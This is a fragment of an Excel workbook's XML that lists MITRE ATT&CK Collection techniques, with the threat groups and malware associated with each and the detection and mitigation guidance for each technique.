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01"/>
  <workbookPr filterPrivacy="1" codeName="ThisWorkbook"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="465" windowWidth="28800" windowHeight="16605" tabRatio="773" firstSheet="3" activeTab="3" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="ATTACK_ALL" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="Groups" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="ATTACK-dedupe" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Linux Atomic Red Tests" sheetId="7" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">ATTACK_ALL!$A$1:$O$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'ATTACK-dedupe'!$A$1:$M$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">Groups!$A$1:$R$1</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2" i="7" l="1"/>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alcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="54716" uniqueCount="3195">
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>TechniqueName</t>
  </si>
  <si>
    <t>Group</t>
  </si>
  <si>
    <t>Group Alias</t>
  </si>
  <si>
    <t>Group ID</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Bypass</t>
  </si>
  <si>
    <t>Analytic Details</t>
  </si>
  <si>
    <t>Mitigation</t>
  </si>
  <si>
    <t>Platform</t>
  </si>
  <si>
    <t>Requires Permission</t>
  </si>
  <si>
    <t>Requires System</t>
  </si>
  <si>
    <t>CAPEC ID</t>
  </si>
  <si>
    <t>Contributor</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>APT3</t>
  </si>
  <si>
    <t>APT3 Gothic Panda Pirpi UPS Team Buckeye Threat Group-0110 TG-0110 ,</t>
  </si>
  <si>
    <t>G0022</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] will identify Microsoft Office documents on the victim's computer. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Linux,macOS,Windows</t>
  </si>
  <si>
    <t>Privileges to access certain files and directories</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1005</t>
  </si>
  <si>
    <t>APT29</t>
  </si>
  <si>
    <t>APT29 The Dukes Cozy Bear CozyDuke ,</t>
  </si>
  <si>
    <t>G0016</t>
  </si>
  <si>
    <t>Software: CosmicDuke, TinyBaron, ...</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] steals user files from local hard drives with file extensions that match a predefined list.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>APT32</t>
  </si>
  <si>
    <t>APT32 OceanLotus Group ,</t>
  </si>
  <si>
    <t>G0050</t>
  </si>
  <si>
    <t>Software: Cobalt Strike</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can collect data from a local system.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>APT30</t>
  </si>
  <si>
    <t>APT30 ,</t>
  </si>
  <si>
    <t>G0013</t>
  </si>
  <si>
    <t>Software: FLASHFLOOD</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] searches for interesting files (either a default or customized set of file extensions) on the local system. [[Software/S0036|FLASHFLOOD]] will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. [[Software/S0036|FLASHFLOOD]] also collects information stored in the Windows Address Book.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>BRONZE BUTLER</t>
  </si>
  <si>
    <t>BRONZE BUTLER REDBALDKNIGHT Tick ,</t>
  </si>
  <si>
    <t>G0060</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used a tool to capture screenshots.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment. ,</t>
  </si>
  <si>
    <t>Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1113</t>
  </si>
  <si>
    <t>Cleaver</t>
  </si>
  <si>
    <t>Cleaver TG-2889 Threat Group 2889 ,</t>
  </si>
  <si>
    <t>G0003</t>
  </si>
  <si>
    <t>Software: TinyZBot</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] contains screen capture functionality.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>Software: PinchDuke</t>
  </si>
  <si>
    <t>[[Software/S0048|PinchDuke]] collects user files from the compromised host based on predefined file extensions.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>APT1</t>
  </si>
  <si>
    <t>APT1 Comment Crew Comment Group Comment Panda ,</t>
  </si>
  <si>
    <t>G0006</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] has collected files from a local victim.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>Lazarus Group HIDDEN COBRA Guardians of Peace ZINC NICKEL ACADEMY ,</t>
  </si>
  <si>
    <t>G0032</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers.[[CiteRef::Novetta Blockbuster Loaders]] [[Group/G0032|Lazarus Group]] malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>Ke3chang</t>
  </si>
  <si>
    <t>Ke3chang ,</t>
  </si>
  <si>
    <t>G0004</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] gathered information and files from local directories for exfiltration.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>Patchwork</t>
  </si>
  <si>
    <t>Patchwork Dropping Elephant Chinastrats ,</t>
  </si>
  <si>
    <t>G0040</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] collected and exfiltrated files from the infected system.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>MONSOON</t>
  </si>
  <si>
    <t>MONSOON Operation Hangover ,</t>
  </si>
  <si>
    <t>G0042</t>
  </si>
  <si>
    <t>Software: BADNEWS</t>
  </si>
  <si>
    <t>When it first starts, [[Software/S0128|BADNEWS]] crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>CopyKittens</t>
  </si>
  <si>
    <t>CopyKittens ,</t>
  </si>
  <si>
    <t>G0052</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has exfiltrated files stolen from local systems.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>FIN5</t>
  </si>
  <si>
    <t>FIN5 ,</t>
  </si>
  <si>
    <t>G0053</t>
  </si>
  <si>
    <t>Software: RawPOS, FIENDCRY, ...</t>
  </si>
  <si>
    <t>[[Software/S0169|RawPOS]] dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.[[CiteRef::TrendMicro RawPOS April 2015]][[CiteRef::Mandiant FIN5 GrrCON Oct 2016]][[CiteRef::Kroll RawPOS Jan 2017]]</t>
  </si>
  <si>
    <t>Dust Storm</t>
  </si>
  <si>
    <t>Dust Storm ,</t>
  </si>
  <si>
    <t>G0031</t>
  </si>
  <si>
    <t>[[Group/G0031|Dust Storm]] has used Android backdoors capable of exfiltrating specific files directly from the infected devices.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]]'s "beacon" payload is capable of capturing screen shots.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>RTM ,</t>
  </si>
  <si>
    <t>G0048</t>
  </si>
  <si>
    <t>Software: RTM</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can capture screenshots.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Sandworm Team</t>
  </si>
  <si>
    <t>Sandworm Team Quedagh ,</t>
  </si>
  <si>
    <t>G0034</t>
  </si>
  <si>
    <t>Software: BlackEnergy, Black Energy</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] is capable of taking screenshots.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>menuPass</t>
  </si>
  <si>
    <t>menuPass Stone Panda APT10 Red Apollo CVNX ,</t>
  </si>
  <si>
    <t>G0045</t>
  </si>
  <si>
    <t>Software: EvilGrab</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] has the capability to capture screenshots.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] has a command to take a screenshot and send it to the C2 server.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Software: SeaDuke, SeaDaddy, SeaDesk</t>
  </si>
  <si>
    <t>Some [[Software/S0053|SeaDuke]] samples have a module to extract email from Microsoft Exchange servers using compromised credentials.[[CiteRef::Symantec Seaduke 2015]]</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for [[Exfiltration]], unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.
Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1114</t>
  </si>
  <si>
    <t>Dragonfly</t>
  </si>
  <si>
    <t>Dragonfly Energetic Bear ,</t>
  </si>
  <si>
    <t>G0035</t>
  </si>
  <si>
    <t>Software: Backdoor.Oldrea, Havex</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] collects address book information from Outlook.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files, and MAPIGET steals email still on Exchange servers that has not yet been archived.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Software: ZLib</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to obtain screenshots of the compromised system.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>FIN7 ,</t>
  </si>
  <si>
    <t>G0046</t>
  </si>
  <si>
    <t>Software: HALFBAKED</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can obtain screenshots from the victim.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] has performed screen captures of victims.[[CiteRef::Symantec Dragonfly Sept 2017]]</t>
  </si>
  <si>
    <t>Software: Trojan.Karagany</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>Magic Hound</t>
  </si>
  <si>
    <t>Magic Hound Rocket Kitten Operation Saffron Rose Ajax Security Team Operation Woolen-Goldfish Newscaster Cobalt Gypsy ,</t>
  </si>
  <si>
    <t>G0059</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware can take a screenshot and upload the file to its C2 server.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>Software: RedLeaves, BUGJUICE</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can capture screenshots.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>Gamaredon Group</t>
  </si>
  <si>
    <t>Gamaredon Group ,</t>
  </si>
  <si>
    <t>G0047</t>
  </si>
  <si>
    <t>Software: Pteranodon</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] can capture screenshots at a configurable interval.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Group5</t>
  </si>
  <si>
    <t>Group5 ,</t>
  </si>
  <si>
    <t>G0043</t>
  </si>
  <si>
    <t>Malware used by [[Group/G0043|Group5]] is capable of watching the victim's screen.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>Scarlet Mimic</t>
  </si>
  <si>
    <t>Scarlet Mimic ,</t>
  </si>
  <si>
    <t>G0029</t>
  </si>
  <si>
    <t>Software: MobileOrder</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] exfiltrates data collected from the victim mobile device.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] copies documents under 15MB found on the victim system to is the user's &lt;code&gt;%temp%\SMB\&lt;/code&gt; folder.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1074</t>
  </si>
  <si>
    <t>OilRig</t>
  </si>
  <si>
    <t>OilRig ,</t>
  </si>
  <si>
    <t>G0049</t>
  </si>
  <si>
    <t>Software: Helminth</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] creates folders to store output from batch scripts prior to sending the information to its C2 server.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.[[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>APT28</t>
  </si>
  <si>
    <t>APT28 Sednit Sofacy Pawn Storm Fancy Bear STRONTIUM Tsar Team Threat Group-4127 TG-4127 ,</t>
  </si>
  <si>
    <t>G0007</t>
  </si>
  <si>
    <t>A [[Group/G0007|APT28]] backdoor may collect the entire contents of an inserted USB device.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Privileges to access removable media drive and files</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1025</t>
  </si>
  <si>
    <t>Software: USBStealer, USB Stealer, Win32/USBStealer</t>
  </si>
  <si>
    <t>Once a removable media device is inserted back into the first victim, [[Software/S0136|USBStealer]] collects data from it that was exfiltrated from a second victim.[[CiteRef::ESET Sednit USBStealer 2014]][[CiteRef::Kaspersky Sofacy]]</t>
  </si>
  <si>
    <t>Threat Group-3390</t>
  </si>
  <si>
    <t>Threat Group-3390 TG-3390 Emissary Panda BRONZE UNION ,</t>
  </si>
  <si>
    <t>G0027</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors saved RAR files for exfiltration in the Recycler directory. They have also staged RAR files, renamed with a .zip file extension, on externally accessible Web servers and then issued HTTP GET requests to exfiltrate the files from the victim network.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has staged encrypted archives for exfiltration on Internet-facing servers that had previously been compromised with [[Software/S0020|China Chopper]].[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>APT34</t>
  </si>
  <si>
    <t>APT34 ,</t>
  </si>
  <si>
    <t>G0057</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can create a directory (&lt;code&gt;C:\ProgramData\Mail\MailAg\gl&lt;/code&gt;) to use as a temporary directory for uploading files.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>Software: SPACESHIP</t>
  </si>
  <si>
    <t>[[Software/S0035|SPACESHIP]] identifies files with certain extensions and copies them to a directory in the user's profile.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>FIN6</t>
  </si>
  <si>
    <t>FIN6 ,</t>
  </si>
  <si>
    <t>G0037</t>
  </si>
  <si>
    <t>TRINITY malware used by [[Group/G0037|FIN6]] identifies payment card track data on the victim and then copies it to a local file in a subdirectory of &lt;code&gt;C:\Windows\&lt;/code&gt;. Once the malware collects the data, [[Group/G0037|FIN6]] actors compressed data and moved it to another staging system before exfiltration.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] creates various subdirectories under &lt;code&gt;%Temp%\reports\%&lt;/code&gt; and copies files to those subdirectories. It also creates a folder at &lt;code&gt;C:\Users\&lt;Username&gt;\AppData\Roaming\Microsoft\store&lt;/code&gt; to store screenshot JPEG files.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Data captured by [[Software/S0169|RawPOS]] is placed in a temporary file under a directory named "memdump".[[CiteRef::Kroll RawPOS Jan 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] scripts save memory dump data into a specific directory on hosts in the victim environment.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] steals user files from removable media with file extensions and keywords that match a predefined list.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Software: POWRUNER</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] can capture a screenshot from a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has a tool called CANDYKING to capture a screenshot of user's desktop.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] takes periodic screenshots and exfiltrates them.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] ran a command to compile an archive of file types of interest from the victim user's directories.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>Stealth Falcon ,</t>
  </si>
  <si>
    <t>G0038</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers data from the local victim system.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>Software: Daserf, Muirim, Nioupale</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] can take screenshots.[[CiteRef::Trend Micro Daserf Nov 2017]][[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors saved RAR files for exfiltration in the Recycler directory on a victim system.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Strider</t>
  </si>
  <si>
    <t>Strider ProjectSauron ,</t>
  </si>
  <si>
    <t>G0041</t>
  </si>
  <si>
    <t>Software: Remsec, Backdoor.Remsec, ProjectSauron</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] has a package that collects documents from any inserted USB sticks.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has been known to stage files for exfiltration in a single location. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by [[Software/S0035|SPACESHIP]].[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>A [[Group/G0047|Gamaredon Group]] file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Software: XAgentOSX</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] regularly deploys a custom tool to take regular screenshots of victims.[[CiteRef::ESET Sednit Part 2]][[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.[[CiteRef::ESET Sednit USBStealer 2014]][[CiteRef::Kaspersky Sofacy]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has stored captured credential information in a file named pi.log.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] leveraged Outlook Web Access.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] steals user files from network shared drives with file extensions and keywords that match a predefined list.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Privileges to access network shared drive</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1039</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process Monitoring,API monitoring</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications ,</t>
  </si>
  <si>
    <t>Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing [[Privilege Escalation]] and [[Technique/T1088|Bypass User Account Control]] opportunities can limit the exposure to this technique. 
Close all browser sessions regularly and when they are no longer needed.</t>
  </si>
  <si>
    <t>Administrator,SYSTEM</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1185</t>
  </si>
  <si>
    <t xml:space="preserve"> ,</t>
  </si>
  <si>
    <t>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to [[Exfiltration]].
Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [[Software/S0106|cmd]] may be used to gather information. Some adversaries may also use [[Technique/T1119|Automated Collection]] on removable media.</t>
  </si>
  <si>
    <t>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to [[Exfiltration]].
Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [[Technique/T1059|Command-Line Interface]], such as [[Software/S0106|cmd]], which has functionality to interact with the file system to gather information. Some adversaries may also use [[Technique/T1119|Automated Collection]] on the local system.</t>
  </si>
  <si>
    <t>When it first starts, [[Software/S0128|BADNEWS]] crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Sowbug</t>
  </si>
  <si>
    <t>Sowbug ,</t>
  </si>
  <si>
    <t>G0054</t>
  </si>
  <si>
    <t>extracted Word documents from a file server on a victim network.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has exfiltrated files stolen from file shares.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has collected data from remote systems by mounting network shares with &lt;code&gt;net use&lt;/code&gt; and using Robocopy to transfer data.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to [[Exfiltration]].
Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [[Software/S0106|cmd]] may be used to gather information.</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data. ,</t>
  </si>
  <si>
    <t>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
